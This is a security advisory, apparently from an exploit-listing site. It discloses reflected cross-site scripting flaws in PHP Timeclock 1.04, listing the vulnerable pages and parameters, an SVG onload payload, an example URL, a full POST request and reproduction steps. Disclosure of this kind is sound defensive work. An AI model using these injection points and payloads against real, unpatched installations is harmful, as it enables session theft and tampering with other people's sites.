PHP Timeclock 1.04 Cross Site Scripting

2021.05.10
Credit: Tyler Butler
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS) # Date: May 3rd 2021 # Exploit Author: Tyler Butler # Vendor Homepage: http://timeclock.sourceforge.net # Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/ # Version: 1.04 # Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5 Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities #1: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application by appending a termination /'> and payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php (2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php. Payload: /'><svg/onload=alert`xss`> Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E ß Steps to reproduce: 1. Navigate to a site that uses PHP Timeclock 1.04 or earlier 2. Make a GET request to one of the four resources mentioned above 3. Append /'> and the payload to the end of the request 4. Submit the request and observe payload execution #2: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters. # Example: POST /reports/audit.php HTTP/1.1 Host: localhost Content-Length: 98 Cache-Control: max-age=0 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/reports/audit.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo Connection: close date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5 Payload: '><svg/onload=alert`xss`> Steps to reproduce: 1. Navigate to a site that uses PHP Timeclock 1.04 or earlier 2. Create a report at one of the vulnerable directories noted above 3. Intercept the request with a proxy tool like BurpSuite 4. Inject payload into the from_date or to_date fields


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top